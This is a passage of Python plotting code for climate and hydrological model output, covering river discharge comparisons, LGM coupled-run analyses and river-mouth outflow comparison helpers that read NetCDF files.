plt.xlabel("Time/days")
plt.ylabel("Discharge Rate/m^3/s")
total_discharge_info=""
total_discharge_info += self._river_discharge_outflow_comparison_helper(ax,river_discharge_output_filepath=\
os.path.join(self.river_discharge_output_data_path,
"hd_1990-01-2_hd_higres_output__ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_20170113_135934.nc"),
rdirs_filepath=\
os.path.join(self.upscaled_rdirs_data_directory,
"upscaled_rdirs_ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_20170113_135934_upscaled_updated_transf.nc"),
num_timeslices=365,label="Dynamic Model")
total_discharge_info += self._river_discharge_outflow_comparison_helper(ax,river_discharge_output_filepath=\
os.path.join(self.river_discharge_output_data_path,
"hd_1990-01-2_hd_higres_output_from_current_model.nc"),
rdirs_filepath=\
os.path.join(self.rdirs_data_directory,
"rdirs_from_current_hdparas.nc"),
num_timeslices=365,label="Current JSBACH Model")
total_discharge_info += self._river_discharge_outflow_comparison_helper(ax,river_discharge_output_filepath=\
os.path.join(self.river_discharge_output_data_path,
"hd_1990-01-2_hd_higres_output_from_current_model_after_100_cycles.nc"),
rdirs_filepath=\
os.path.join(self.rdirs_data_directory,
"rdirs_from_current_hdparas.nc"),
num_timeslices=365,label="Current Model HD Run using 100 cycle spin-up ")
total_discharge_info += self._river_discharge_outflow_comparison_helper(ax,river_discharge_output_filepath=\
os.path.join(self.river_discharge_output_data_path,
"hd_1990-01-2_hd_higres_output__ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_20170113_135934_after_one_years_running.nc"),
rdirs_filepath=\
os.path.join(self.upscaled_rdirs_data_directory,
"upscaled_rdirs_ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_20170113_135934_upscaled_updated_transf.nc"),
num_timeslices=365,label="Dynamic HD using 1 cycle spin-up")
total_discharge_info += self._river_discharge_outflow_comparison_helper(ax,river_discharge_output_filepath=\
os.path.join(self.river_discharge_output_data_path,
"hd_1990-01-2_hd_higres_output__ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_20170116_235534.nc"),
rdirs_filepath=\
os.path.join(self.upscaled_rdirs_data_directory,
"upscaled_rdirs_ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_20170113_135934_upscaled_updated_transf.nc"),
num_timeslices=365,label="Dynamic HD using 1 cycle spin-up as basis")
days = np.linspace(1,365,365)
lost_discharge = self._calculate_discharge_lost_to_changes_in_lsmask(lsmask_source_ref_filepath=\
os.path.join(self.jsbach_restart_file_directory,
"jsbach_T106_11tiles_5layers_1976.nc"),
lsmask_source_data_filepath=\
os.path.join(self.generated_jsbach_restart_file_directory,
"updated_jsbach_T106_11tiles_5layers_1976_ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_20170123_165707.nc"),
run_off_filepath=os.path.join(self.hdinput_data_directory,'runoff_T106_1990.nc'),
discharge_filepath=os.path.join(self.hdinput_data_directory,'drainage_T106_1990.nc'),
cell_areas_filepath=os.path.join(self.cell_areas_data_directory,'T106_grid_cell_areas.nc'),
num_timeslices=365,grid_type="T106")
ax.plot(days,lost_discharge,label="Lost discharge")
ax.legend()
print(total_discharge_info)
def plot_comparison_using_1990_rainfall_data_adding_back_to_discharge(self):
ax = plt.subplots(1, 1, figsize=(12, 9))[1]
plt.ylim(0,7000000)
plt.xlim(1,365)
plt.xlabel("Time/days")
plt.ylabel("Discharge Rate/m^3/s")
total_discharge_info=""
total_discharge_info += self._river_discharge_outflow_comparison_helper(ax,river_discharge_output_filepath=\
os.path.join(self.river_discharge_output_data_path,
"hd_1990-01-2_hd_higres_output_from_current_model_after_100_cycles.nc"),
rdirs_filepath=\
os.path.join(self.rdirs_data_directory,
"rdirs_from_current_hdparas.nc"),
num_timeslices=365,label="Current Model HD Run using 100 cycle spin-up")
total_discharge_info += self._river_discharge_outflow_comparison_helper(ax,river_discharge_output_filepath=\
os.path.join(self.river_discharge_output_data_path,
"hd_1990-01-2_hd_higres_output__ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_20170113_135934_after_one_years_running.nc"),
rdirs_filepath=\
os.path.join(self.upscaled_rdirs_data_directory,
"upscaled_rdirs_ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_20170113_135934_upscaled_updated_transf.nc"),
num_timeslices=365,label="Dynamic HD using 1 cycle spin-up")
total_discharge_info += self._river_discharge_outflow_comparison_helper(ax,river_discharge_output_filepath=\
os.path.join(self.river_discharge_output_data_path,
"hd_1990-01-2_hd_higres_output__ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_20170116_235534.nc"),
rdirs_filepath=\
os.path.join(self.upscaled_rdirs_data_directory,
"upscaled_rdirs_ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_20170113_135934_upscaled_updated_transf.nc"),
num_timeslices=365,label="Dynamic HD using 1 cycle spin-up as basis")
lost_discharge = self._calculate_discharge_lost_to_changes_in_lsmask(lsmask_source_ref_filepath=\
os.path.join(self.jsbach_restart_file_directory,
"jsbach_T106_11tiles_5layers_1976.nc"),
lsmask_source_data_filepath=\
os.path.join(self.generated_jsbach_restart_file_directory,
"updated_jsbach_T106_11tiles_5layers_1976_ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_20170123_165707.nc"),
run_off_filepath=os.path.join(self.hdinput_data_directory,'runoff_T106_1990.nc'),
discharge_filepath=os.path.join(self.hdinput_data_directory,'drainage_T106_1990.nc'),
cell_areas_filepath=os.path.join(self.cell_areas_data_directory,'T106_grid_cell_areas.nc'),
num_timeslices=365,grid_type="T106")
total_discharge_info += self._river_discharge_outflow_comparison_helper(ax,river_discharge_output_filepath=\
os.path.join(self.river_discharge_output_data_path,
"hd_1990-01-2_hd_higres_output__ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_20170113_135934_after_one_years_running.nc"),
rdirs_filepath=\
os.path.join(self.upscaled_rdirs_data_directory,
"upscaled_rdirs_ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_20170113_135934_upscaled_updated_transf.nc"),
num_timeslices=365,lost_discharge=lost_discharge,label="Dynamic HD using 1 cycle spin-up + lost discharge")
total_discharge_info += self._river_discharge_outflow_comparison_helper(ax,river_discharge_output_filepath=\
os.path.join(self.river_discharge_output_data_path,
"hd_1990-01-2_hd_higres_output__ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_20170113_135934_after_thirty_years_running.nc"),
rdirs_filepath=\
os.path.join(self.upscaled_rdirs_data_directory,
"upscaled_rdirs_ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_20170113_135934_upscaled_updated_transf.nc"),
num_timeslices=365,lost_discharge=lost_discharge,label="Dynamic HD using 30 cycle spin-up + lost discharge")
total_discharge_info += self._river_discharge_outflow_comparison_helper(ax,river_discharge_output_filepath=\
os.path.join(self.river_discharge_output_data_path,
"hd_1990-01-2_hd_higres_output__ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_20170116_235534.nc"),
rdirs_filepath=\
os.path.join(self.upscaled_rdirs_data_directory,
"upscaled_rdirs_ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_20170113_135934_upscaled_updated_transf.nc"),
num_timeslices=365,lost_discharge=lost_discharge,label="Dynamic HD using 1 cycle spin-up as basis+ lost discharge")
ax.legend()
print(total_discharge_info)
class CoupledRunOutputPlots(HDOutputPlots):
    """A class for plotting the output of coupled runs"""

    def __init__(self,save=False,color_palette_to_use="default"):
        """Class constructor."""
        super(CoupledRunOutputPlots,self).__init__(save,color_palette_to_use)

    def ice6g_rdirs_lgm_run_discharge_plot(self):
        """Plot accumulated river mouth outflow for the LGM run using ICE6G river directions."""
        cell_areas = iodriver.load_field("/Users/thomasriddick/Documents/data/HDdata/"
                                         "gridareasandspacings/hdcellareas.nc",".nc",
                                         field_type='Generic',fieldname="cell_area",
                                         grid_type='HD')
        rdirs = iodriver.load_field(os.path.join(self.rdirs_data_directory,
                                                 "generated","upscaled",
                                                 "upscaled_rdirs_ICE5G_21k_ALG4_sinkless"
                                                 "_no_true_sinks_oceans_lsmask_plus_upscale"
                                                 "_rdirs_tarasov_orog_corrs_generation_and_"
                                                 "upscaling_20170615_174943_upscaled_updated"
                                                 "_transf.nc"),
                                    ".nc",field_type='Generic',grid_type='HD')
        outflow_data = None
        for time in range(120):
            discharge = iodriver.load_field(os.path.join(self.river_discharge_output_data_path,
                                                         "rid0004_hd_higres_mon_79900101_79991231.nc"),
                                            ".nc",field_type='Generic',fieldname="friv",timeslice=time,
                                            grid_type='HD')
            #Bug fix: the accumulation guard previously tested a variable that
            #was never updated, so only the final timeslice was retained
            if outflow_data is None:
                outflow_data = discharge.get_data()
            else:
                outflow_data = outflow_data + discharge.get_data()
        #Keep only river mouth points; cells with a non-zero direction are not outflows
        outflow_data[ rdirs.get_data() != 0 ] = 0.0
        outflow_times_area = outflow_data*cell_areas.get_data()
        plt.figure()
        plt.imshow(outflow_times_area,norm=mpl.colors.LogNorm(),interpolation='none')
        plt.colorbar()

    def extended_present_day_rdirs_lgm_run_discharge_plot(self):
        """Plot accumulated river mouth outflow for the LGM run using extended present day river directions."""
        cell_areas = iodriver.load_field("/Users/thomasriddick/Documents/data/HDdata/"
                                         "gridareasandspacings/hdcellareas.nc",".nc",
                                         field_type='Generic',fieldname="cell_area",
                                         grid_type='HD')
        rdirs = iodriver.load_field(os.path.join(self.rdirs_data_directory,
                                                 "rivdir_vs_1_9_data_from_stefan.nc"),
                                    ".nc",field_type='Generic',grid_type='HD')
        outflow_data = None
        for time in range(120):
            discharge = iodriver.load_field(os.path.join(self.river_discharge_output_data_path,
                                                         "rid0003_hd_higres_mon_79900101_79991231.nc"),
                                            ".nc",field_type='Generic',fieldname="friv",timeslice=time,
                                            grid_type='HD')
            #Bug fix: the accumulation guard previously tested a variable that
            #was never updated, so only the final timeslice was retained
            if outflow_data is None:
                outflow_data = discharge.get_data()
            else:
                outflow_data = outflow_data + discharge.get_data()
        #Keep only river mouth points; cells with a non-zero direction are not outflows
        outflow_data[ rdirs.get_data() != 0 ] = 0.0
        outflow_times_area = outflow_data*cell_areas.get_data()
        plt.figure()
        plt.imshow(outflow_times_area,norm=mpl.colors.LogNorm(),interpolation='none')
        plt.colorbar()

    def extended_present_day_rdirs_vs_ice6g_rdirs_lgm_echam(self):
        """Compare ECHAM/JSBACH discharge between the extended present day and ICE6G river direction LGM runs.

        Plots the masked difference field, latitudinal and longitudinal
        totals, per-basin (Atlantic and Indo-Pacific) totals, and cumulative
        totals integrated from the north pole southwards.
        """
        difference_in_lgm_data_filename=os.path.join(self.river_discharge_output_data_path,
                                                     "rid0004_minus_rid0003_jsbach_jsbach"
                                                     "_mm_last_100_year_mean_times_area.nc")
        lgm_lsmask_file = os.path.join(self.river_discharge_output_data_path,
                                       "rid0003_jsbach_jsbach_tm_7900-7999.nc")
        with Dataset(difference_in_lgm_data_filename,
                     mode='r',format='NETCDF4') as dataset:
            fields = dataset.get_variables_by_attributes(name="var218")
            difference_field = np.asarray(fields[0])[0,:,:]
        #Bug fix: this dataset was previously opened without 'as dataset', so
        #the closed dataset from the block above was (incorrectly) queried
        with Dataset(lgm_lsmask_file,mode='r',format='NETCDF4') as dataset:
            fields = dataset.get_variables_by_attributes(name="land_fract")
            lgm_lsmask = np.asarray(fields[0])[0,:,:]
        difference_field_masked = np.ma.array(difference_field,
                                              mask=lgm_lsmask)
        plt.figure()
        plt.imshow(difference_field_masked,interpolation='none')
        cb = plt.colorbar()
        cb.set_label(r"River Discharge ($m^{3}s^{-1}$)")
        nlat=48
        nlon=96
        #Multiplying the mean along an axis by the number of cells gives the total
        difference_field_total_horizontal_slice =\
            np.mean(difference_field,axis=0)*nlat
        difference_field_total_vertical_slice =\
            np.mean(difference_field,axis=1)*nlon
        xvalues1 = np.linspace(0,360,num=96)
        ax1 = plt.subplots(1, 1, figsize=(12, 9))[1]
        ax1.plot(xvalues1,difference_field_total_horizontal_slice)
        ax1.set_xlabel("Longitude (Degrees East)")
        ax1.set_ylabel(r'River Discharge ($m^{3}s^{-1}$)')
        ax1.set_title("Latitudal Totals")
        ax1.set_xlim(0,360)
        xvalues2 = np.linspace(-90,90,num=48)
        ax2 = plt.subplots(1, 1, figsize=(12, 9))[1]
        ax2.plot(xvalues2,np.flipud(difference_field_total_vertical_slice))
        ax2.set_xlabel("Latitude (Degrees North)")
        ax2.set_ylabel(r'River Discharge ($m^{3}s^{-1}$)')
        ax2.set_title("Longitude Totals")
        ax2.set_xlim(-90,90)
        #Hand-drawn basin division of the 48x96 grid; True marks cells
        #excluded from the Pacific (i.e. cells masked out when computing
        #Indo-Pacific totals)
        pacific_unmasked = np.zeros((48,96),dtype=bool) #np.bool is removed in modern numpy
        pacific_unmasked[0:7,:] = True
        pacific_unmasked[:,0:7] = True
        pacific_unmasked[:18,70:] = True
        pacific_unmasked[18:21,72:] = True
        pacific_unmasked[21:,77:] = True
        atlantic_unmasked = np.invert(pacific_unmasked)
        #Bug fix: filled returns a new array rather than filling in place; the
        #result was previously discarded so masked cells were excluded from the
        #means instead of contributing zero (making mean*nlon not a true total)
        difference_field_pacific_unmasked =\
            np.ma.array(difference_field,mask=pacific_unmasked).filled(0)
        difference_field_pacific_unmasked_total_vertical_slice =\
            np.mean(difference_field_pacific_unmasked,axis=1)*nlon
        ax3 = plt.subplots(1, 1, figsize=(12, 9))[1]
        ax3.plot(xvalues2,
                 np.flipud(difference_field_pacific_unmasked_total_vertical_slice))
        ax3.set_xlim(-90,90)
        ax3.set_xlabel("Latitude (Degrees North)")
        ax3.set_ylabel(r'River Discharge Difference ($m^{3}s^{-1}$)')
        ax3.set_title("Indo-Pacific")
        difference_field_atlantic_unmasked =\
            np.ma.array(difference_field,mask=atlantic_unmasked).filled(0)
        difference_field_atlantic_unmasked_total_vertical_slice =\
            np.mean(difference_field_atlantic_unmasked,axis=1)*nlon
        ax4 = plt.subplots(1, 1, figsize=(12, 9))[1]
        ax4.plot(xvalues2,
                 np.flipud(difference_field_atlantic_unmasked_total_vertical_slice))
        ax4.set_xlim(-90,90)
        ax4.set_xlabel("Latitude (Degrees North)")
        ax4.set_ylabel(r'River Discharge Difference ($m^{3}s^{-1}$)')
        ax4.set_title("Atlantic")
        #Cumulative sums replace the previous hand-rolled np.nditer loops
        difference_field_atlantic_unmasked_total_vertical_slice_summed = \
            np.cumsum(difference_field_atlantic_unmasked_total_vertical_slice)
        ax5 = plt.subplots(1, 1, figsize=(12, 9))[1]
        ax5.plot(xvalues2,
                 np.flipud(difference_field_atlantic_unmasked_total_vertical_slice_summed))
        ax5.set_xlim(-90,90)
        ax5.set_xlabel("Latitude (Degrees North)")
        ax5.set_ylabel(r'Cumulative River Discharge Difference ($m^{3}s^{-1}$)')
        ax5.set_title("Integrated Atlantic Discharge Starting from the North Pole")
        difference_field_pacific_unmasked_total_vertical_slice_summed = \
            np.cumsum(difference_field_pacific_unmasked_total_vertical_slice)
        ax6 = plt.subplots(1, 1, figsize=(12, 9))[1]
        ax6.plot(xvalues2,
                 np.flipud(difference_field_pacific_unmasked_total_vertical_slice_summed))
        ax6.set_xlim(-90,90)
        ax6.set_xlabel("Latitude (Degrees North)")
        ax6.set_ylabel(r'Cumulative River Discharge Difference ($m^{3}s^{-1}$)')
        ax6.set_title("Integrated Indo-Pacific Discharge Starting from the North Pole")

    def extended_present_day_rdirs_vs_ice6g_rdirs_lgm_mpiom_pem(self):
        """Plot the masked difference in MPIOM P-E-M water flux between the two LGM runs."""
        difference_in_lgm_data_filename=os.path.join(self.river_discharge_output_data_path,
                                                     "rid0004_minus_rid0003_mpim_data_2d_mm"
                                                     "_last_100_years_premeaned_non_nan.nc")
        mpiom_lgm_mask_filename=os.path.join(self.river_discharge_output_data_path,
                                             "rid0004landseamask.np")
        with Dataset(difference_in_lgm_data_filename,
                     mode='r',format='NETCDF4') as dataset:
            fields = dataset.get_variables_by_attributes(name="pem")
            difference_field = np.asarray(fields[0])[0,0,:,:]
        with Dataset(mpiom_lgm_mask_filename,
                     mode='r',format='NETCDF4') as dataset:
            fields = dataset.get_variables_by_attributes(name="pem")
            lsmask = np.asarray(fields[0])[0,0,:,:]
        difference_field_masked = np.ma.array(difference_field,mask=lsmask)
        plt.figure()
        plt.imshow(difference_field_masked,interpolation='none')
        cb = plt.colorbar()
        cb.set_label(r"Water Flux Into Ocean $(m^{3}s^{-1})$")

    def ocean_grid_extended_present_day_rdirs_vs_ice6g_rdirs_lgm_run_discharge_plot(self):
        """Plot implied freshwater transport on the ocean grid for both LGM runs and their difference."""
        extended_present_day_rdirs_data_filename=os.path.join(self.river_discharge_output_data_path,
                                                              "rid0003_mpiom_data_moc_mm_last_100_years.nc")
        ice6g_rdirs_data_filename=os.path.join(self.river_discharge_output_data_path,
                                               "rid0004_mpiom_data_moc_mm_last_100_years.nc")
        difference_on_ocean_grid_filename=os.path.join(self.river_discharge_output_data_path,
                                                       "rid0004_minus_0003_mpiom_data_moc_mm"
                                                       "_last_100_years.nc")
        with Dataset(extended_present_day_rdirs_data_filename,
                     mode='r',format='NETCDF4') as dataset:
            fields = dataset.get_variables_by_attributes(name="atlantic_wfl")
            atlantic_wfl_ext = np.asarray(fields[0])
            fields = dataset.get_variables_by_attributes(name="indopacific_wfl")
            indopacific_wfl_ext = np.asarray(fields[0])
        with Dataset(ice6g_rdirs_data_filename,
                     mode='r',format='NETCDF4') as dataset:
            fields = dataset.get_variables_by_attributes(name="atlantic_wfl")
            atlantic_wfl_ice6g = np.asarray(fields[0])
            fields = dataset.get_variables_by_attributes(name="indopacific_wfl")
            indopacific_wfl_ice6g = np.asarray(fields[0])
        with Dataset(difference_on_ocean_grid_filename,mode='r',format='NETCDF4') as dataset:
            fields = dataset.get_variables_by_attributes(name="atlantic_wfl")
            atlantic_wfl_diff = np.asarray(fields[0])
            fields = dataset.get_variables_by_attributes(name="indopacific_wfl")
            indopacific_wfl_diff = np.asarray(fields[0])
        x = np.linspace(-90,90,num=180)
        #Temporal means; index out the singleton leading and trailing axes
        atlantic_wfl_temporalmean_diff = np.mean(atlantic_wfl_diff,axis=0)[0,:,0]
        indopacific_wfl_temporalmean_diff = np.mean(indopacific_wfl_diff,axis=0)[0,:,0]
        atlantic_wfl_temporalmean_ext = np.mean(atlantic_wfl_ext,axis=0)[0,:,0]
        indopacific_wfl_temporalmean_ext = np.mean(indopacific_wfl_ext,axis=0)[0,:,0]
        atlantic_wfl_temporalmean_ice6g = np.mean(atlantic_wfl_ice6g,axis=0)[0,:,0]
        indopacific_wfl_temporalmean_ice6g = np.mean(indopacific_wfl_ice6g,axis=0)[0,:,0]
        atlantic_bins = [-90,-55,-12,0,31,65,90]
        pacific_bins = [-90,-56,65,90]
        def bin_values(bins,values):
            #For each bin edge, accumulate every cell whose latitude lies north
            #of that edge (binned_values[j] = sum of values north of bins[j]).
            #NOTE(review): the trailing 'continue' is a no-op; if per-bin
            #(non-cumulative) totals were intended this needs revisiting -
            #confirm against the intended step plots
            binned_values = np.zeros((np.size(bins)))
            for i,cell in zip(x,values):
                for j,bin_edge in enumerate(bins):
                    if i > bin_edge:
                        binned_values[j] += cell
                        continue
            return binned_values
        atlantic_bin_wfl_temporalmean_diff = \
            bin_values(atlantic_bins,
                       atlantic_wfl_temporalmean_diff)
        indopacific_bin_wfl_temporalmean_diff = \
            bin_values(pacific_bins,
                       indopacific_wfl_temporalmean_diff)
        ax1 = plt.subplots(1, 1, figsize=(12, 9))[1]
        ax1_step = plt.subplots(1, 1, figsize=(12, 9))[1]
        ax1.plot(x,atlantic_wfl_temporalmean_ext,'.',
                 label='Extended Present Day River Directions')
        ax1.plot(x,atlantic_wfl_temporalmean_ice6g,'.',
                 label='ICE6G River Directions')
        ax1.set_xlabel("Latitude (Degrees North)")
        ax1.set_ylabel("Implied Freshwater Transport ($m^{3}s^{-1}$)")
        ax1.set_xlim(-90,90)
        ax1.set_xticks([-90,-60,-30,0,30,60,90])
        ax1.legend()
        ax1.set_title("Atlantic")
        ax1_step.step(atlantic_bins,
                      atlantic_bin_wfl_temporalmean_diff,
                      where='post',
                      label='Atlantic')
        ax1_step.step(pacific_bins,
                      indopacific_bin_wfl_temporalmean_diff,
                      where='post',
                      label='Indo-Pacific')
        ax1_step.set_xlim(-90,90)
        ax1_step.set_xticks([-90,-60,-30,0,30,60,90])
        ax1_step.set_xlabel("Latitude (Degrees North)")
        ax1_step.set_ylabel("Implied Freshwater Transport ($m^{3}s^{-1}$)")
        ax1_step.legend()
        ax2 = plt.subplots(1, 1, figsize=(12, 9))[1]
        ax2.plot(x,indopacific_wfl_temporalmean_ext,'.',
                 label='Extended Present Day River Directions')
        ax2.plot(x,indopacific_wfl_temporalmean_ice6g,'.',
                 label='ICE6G River Directions')
        ax2.set_xlabel("Latitude (Degrees North)")
        ax2.set_ylabel("Implied Freshwater Transport ($m^{3}s^{-1}$)")
        ax2.set_xlim(-90,90)
        ax2.set_xticks([-90,-60,-30,0,30,60,90])
        ax2.set_title("Indo-Pacific")
        ax2.legend()
        ax3 = plt.subplots(1, 1, figsize=(12, 9))[1]
        ax3.plot(x,atlantic_wfl_temporalmean_diff,'.',
                 label='Atlantic')
        ax3.plot(x,indopacific_wfl_temporalmean_diff,'.',
                 label='Indo-Pacific')
        ax3.set_xlabel("Latitude (Degrees North)")
        ax3.set_ylabel(r'Change in Implied Freshwater Transport ($m^{3}s^{-1}$)')
        ax3.set_xlim(-90,90)
        ax3.set_xticks([-90,-60,-30,0,30,60,90])
        ax3.legend()
class OutflowPlots(Plots):
    """A class for river mouth outflow plots"""
    #Subdirectory names (appended to self.hd_data_path) for each kind of input data
    rmouth_outflow_path_extension = 'rmouthflow'
    flow_maps_path_extension = 'flowmaps'
    rdirs_path_extension = 'rdirs'
    catchments_path_extension = 'catchmentmaps'
    orog_path_extension = 'orographys'
    additional_matches_list_extension = 'addmatches'
    catchment_and_outflows_mods_list_extension = 'catchmods'
    ls_mask_path_extension="lsmasks"

    def __init__(self,save,color_palette_to_use='default'):
        """Class constructor; builds the data directory paths and a unique temp-file label."""
        super(OutflowPlots,self).__init__(save,color_palette_to_use)
        self.rmouth_outflow_data_directory = os.path.join(self.hd_data_path,self.rmouth_outflow_path_extension)
        self.flow_maps_data_directory = os.path.join(self.hd_data_path,self.flow_maps_path_extension)
        self.rdirs_data_directory = os.path.join(self.hd_data_path,self.rdirs_path_extension)
        self.catchments_data_directory = os.path.join(self.hd_data_path,self.catchments_path_extension)
        self.orog_data_directory = os.path.join(self.hd_data_path,self.orog_path_extension)
        self.ls_mask_data_directory = os.path.join(self.hd_data_path,self.ls_mask_path_extension)
        self.additional_matches_list_directory = os.path.join(self.hd_data_path,
                                                              self.additional_matches_list_extension)
        self.catchment_and_outflows_mods_list_directory = os.path.join(self.hd_data_path,
                                                                       self.catchment_and_outflows_mods_list_extension)
        #Timestamped (to the microsecond) label so concurrent runs don't clash on temp files
        self.temp_label = 'temp_' + datetime.datetime.now().strftime("%Y%m%d_%H%M%S%f") + "_"
def OutFlowComparisonPlotHelpers(self,reference_rmouth_outflows_filename,
data_rmouth_outflows_filename,
ref_flowmaps_filename,data_flowmaps_filename,
rdirs_filename,flip_data_field=False,rotate_data_field=False,
flip_ref_field=False,rotate_ref_field=False,
ref_catchment_filename=None,data_catchment_filename=None,
data_catchment_original_scale_filename=None,
data_rdirs_filename=None,
data_original_scale_flow_map_filename=None,
ref_orog_filename=None,
data_orog_original_scale_filename=None,
flip_orog_original_scale_relative_to_data=False,
super_fine_orog_filename=None,
super_fine_data_flowmap_filename=None,
flip_super_fine_orog=False,
rotate_super_fine_orog=False,
additional_matches_list_filename=None,
catchment_and_outflows_mods_list_filename=None,
plot_simple_catchment_and_flowmap_plots=False,
return_simple_catchment_and_flowmap_plotters=False,
return_catchment_plotters=False,
swap_ref_and_data_when_finding_labels=False,
rivers_to_plot=None,
alternative_catchment_bounds=None,
matching_parameter_set='default',
split_comparison_plots_across_multiple_canvases=False,
use_simplified_catchment_colorscheme=False,
use_simplified_flowmap_colorscheme=False,
use_upscaling_labels=False,
select_only_rivers_in=None,
allow_new_true_sinks=False,
ref_original_scale_flow_map_filename=None,
ref_catchment_original_scale_filename=None,
use_original_scale_field_for_determining_data_and_ref_labels=False,
external_ls_mask_filename=None,
flip_external_ls_mask=False,
rotate_external_ls_mask=False,
ref_original_scale_grid_type='HD',
grid_type='HD',data_original_scale_grid_type='HD',
super_fine_orog_grid_type='HD',
data_original_scale_grid_kwargs={},
ref_original_scale_grid_kwargs={},
super_fine_orog_grid_kwargs={},
**grid_kwargs):
"""Help produce a comparison of two fields of river outflow data"""
ref_flowmaps_filepath = os.path.join(self.flow_maps_data_directory,ref_flowmaps_filename)
data_flowmaps_filepath = os.path.join(self.flow_maps_data_directory,data_flowmaps_filename)
rdirs_filepath = os.path.join(self.rdirs_data_directory,rdirs_filename)
if ref_catchment_filename:
ref_catchments_filepath = os.path.join(self.catchments_data_directory,
ref_catchment_filename)
if data_catchment_filename:
data_catchment_filepath = os.path.join(self.catchments_data_directory,
data_catchment_filename)
if data_rdirs_filename:
data_rdirs_filepath = os.path.join(self.rdirs_data_directory,
data_rdirs_filename)
if ref_orog_filename:
ref_orog_filepath = os.path.join(self.orog_data_directory,
ref_orog_filename)
if data_orog_original_scale_filename:
data_orog_original_scale_filepath = os.path.join(self.orog_data_directory,
data_orog_original_scale_filename)
if data_catchment_original_scale_filename:
data_catchment_original_scale_filepath = os.path.join(self.catchments_data_directory,
data_catchment_original_scale_filename)
if ref_catchment_original_scale_filename:
ref_catchment_original_scale_filepath = os.path.join(self.catchments_data_directory,
ref_catchment_original_scale_filename)
if catchment_and_outflows_mods_list_filename:
catchment_and_outflows_mods_list_filepath = os.path.join(self.catchment_and_outflows_mods_list_directory,
catchment_and_outflows_mods_list_filename)
if additional_matches_list_filename:
additional_matches_list_filepath = os.path.join(self.additional_matches_list_directory,
additional_matches_list_filename)
if external_ls_mask_filename:
external_ls_mask_filepath = os.path.join(self.ls_mask_data_directory,
external_ls_mask_filename)
if super_fine_orog_filename:
super_fine_orog_filepath = os.path.join(self.orog_data_directory,
super_fine_orog_filename)
if super_fine_data_flowmap_filename:
super_fine_data_flowmap_filepath = os.path.join(self.flow_maps_data_directory,
super_fine_data_flowmap_filename)
if ref_catchment_filename:
ref_catchment_field = iohlpr.NetCDF4FileIOHelper.load_field(ref_catchments_filepath,
grid_type,**grid_kwargs)
if data_catchment_filename:
data_catchment_field =\
iohlpr.NetCDF4FileIOHelper.load_field(data_catchment_filepath,
grid_type,**grid_kwargs)
if grid_type == data_original_scale_grid_type and grid_kwargs == data_original_scale_grid_kwargs:
catchment_grid_changed = False
data_catchment_field_original_scale = data_catchment_field
else:
catchment_grid_changed = True
if data_catchment_original_scale_filepath is None:
raise RuntimeError('require original scale catchment to use upscaled catchments')
data_catchment_field_original_scale =\
iohlpr.NetCDF4FileIOHelper.load_field(data_catchment_original_scale_filepath,
grid_type=data_original_scale_grid_type,
**data_original_scale_grid_kwargs)
if data_original_scale_flow_map_filename is None:
raise RuntimeError('require original flow to cell data to use upscaled catchments')
else:
data_original_scale_flow_map_filepath = os.path.join(self.flow_maps_data_directory,
data_original_scale_flow_map_filename)
data_original_scale_flowtocellfield = iohlpr.NetCDF4FileIOHelper.\
load_field(data_original_scale_flow_map_filepath,grid_type=data_original_scale_grid_type,
**data_original_scale_grid_kwargs)
if use_original_scale_field_for_determining_data_and_ref_labels:
if ref_original_scale_flow_map_filename is None:
raise RuntimeError('require original flow to cell field to use upscaled catchments for ref')
elif ref_catchment_original_scale_filename is None:
raise RuntimeError('require original scale catchment to use upscaled catchments for ref')
else:
ref_original_scale_flow_map_filepath = os.path.join(self.flow_maps_data_directory,
ref_original_scale_flow_map_filename)
ref_original_scale_flowtocellfield = iohlpr.NetCDF4FileIOHelper.\
load_field(ref_original_scale_flow_map_filepath,grid_type=data_original_scale_grid_type,
**data_original_scale_grid_kwargs)
ref_catchment_field_original_scale =\
iohlpr.NetCDF4FileIOHelper.load_field(ref_catchment_original_scale_filepath,
grid_type=ref_original_scale_grid_type,
**ref_original_scale_grid_kwargs)
else:
ref_original_scale_flowtocellfield = None
ref_catchment_field_original_scale = None
ref_flowtocellfield = iohlpr.NetCDF4FileIOHelper.load_field(ref_flowmaps_filepath,grid_type,**grid_kwargs)
data_flowtocellfield = iohlpr.NetCDF4FileIOHelper.load_field(data_flowmaps_filepath,grid_type,**grid_kwargs)
rdirs_field = iohlpr.NetCDF4FileIOHelper.load_field(rdirs_filepath,grid_type,**grid_kwargs)
ref_grid = grid.makeGrid(grid_type,**grid_kwargs)
if data_rdirs_filename:
if catchment_grid_changed:
data_rdirs_field = iohlpr.NetCDF4FileIOHelper.load_field(data_rdirs_filepath,
grid_type=data_original_scale_grid_type,
**data_original_scale_grid_kwargs)
data_rdirs_field = utilities.upscale_field(input_field=field.\
Field(data_rdirs_field,
grid=data_original_scale_grid_type,
